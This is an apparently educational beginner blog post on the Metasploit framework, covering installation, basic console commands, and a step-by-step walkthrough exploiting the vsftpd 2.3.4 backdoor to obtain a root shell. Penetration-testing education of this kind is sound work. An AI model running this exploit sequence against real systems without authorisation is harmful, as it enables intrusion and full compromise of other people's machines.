Metasploit: A Beginner-Friendly Guide
- Diniz Martins
- May 7
- 2 min read
🔍 What is Metasploit?
Metasploit is an open-source penetration testing framework developed by Rapid7. It helps security professionals find, exploit, and validate vulnerabilities in systems—legally, of course. You can think of it like a Swiss Army knife for hackers (the good kind).
With Metasploit, you can:
Run exploits on known vulnerabilities.
Test systems for weaknesses.
Create your own payloads and listeners.
Conduct post-exploitation tasks.
⚙️ How Does Metasploit Work?
At its core, Metasploit works in three main steps:
Scanning – You identify the target system and gather information about open ports, services, and potential vulnerabilities (tools like Nmap can help here).
Exploitation – You choose a known vulnerability (exploit) and a method to access the system (payload).
Post-Exploitation – Once inside, you can explore the system further: open a shell, read files, dump passwords, or escalate privileges.
🐉 Installing Metasploit on Kali Linux
Luckily, Metasploit comes pre-installed with most versions of Kali Linux. But if for some reason it's missing or you want to install it manually, here’s how:
🔧 Installation via Terminal:
sudo apt update sudo apt install metasploit-framework |
You can verify the installation with:
msfconsole --version |
If you want the latest version from Rapid7, you can install it using their script:
curl https://raw.githubusercontent.com/rapid7/metasploit-framework/master/msfinstall > msfinstall chmod +x msfinstall ./msfinstall |
💻 Starting Metasploit
To launch the Metasploit console, use:
msfconsole |
It may take a few seconds to load, but once it does, you’ll see the familiar banner and prompt:
msf6 > |
You're now in Metasploit!
🛠️ Basic Commands to Get You Started
Here are some essential commands to help you navigate:
Command | Description |
search <keyword> | Search for modules, exploits, payloads |
use <module> | Load a specific module |
show options | Display required settings for the module |
set <option> <value> | Set a value (like RHOST or PAYLOAD) |
exploit or run | Launch the exploit |
exit | Quit Metasploit |
🧠 Tips for Beginners
Always use Metasploit in legal and controlled environments.
Pair it with tools like Nmap, Wireshark, and Burp Suite.
Practice using vulnerable VMs like Metasploitable, DVWA, or Hack The Box labs.
Learn the difference between exploit, payload, module, and session.
🧪 Practical Example: Exploiting vsftpd 2.3.4 with Metasploit
✅ Objective:
Gain a shell on a target machine running a vulnerable FTP service (vsftpd 2.3.4).
🔧 Step-by-step Guide:
1. Launch Metasploit Console
msfconsole2. Search for the Exploit
search vsftpdOutput:
exploit/unix/ftp/vsftpd_234_backdoor3. Use the Exploit Module
use exploit/unix/ftp/vsftpd_234_backdoor4. Set Target IP Address
set RHOST <ip_host>5. (Optional) Confirm Options
show options6. Launch the Exploit
run7. Shell Access
If successful, you’ll get something like this:
[*] Command shell session 1 opened (192.168.1.101:4444 -> 192.168.1.100:6200)Type whoami, uname -a, or id to start interacting with the system:
whoamiOutput:
rootYou now have a root shell on the target machine! 💻🔓
Comments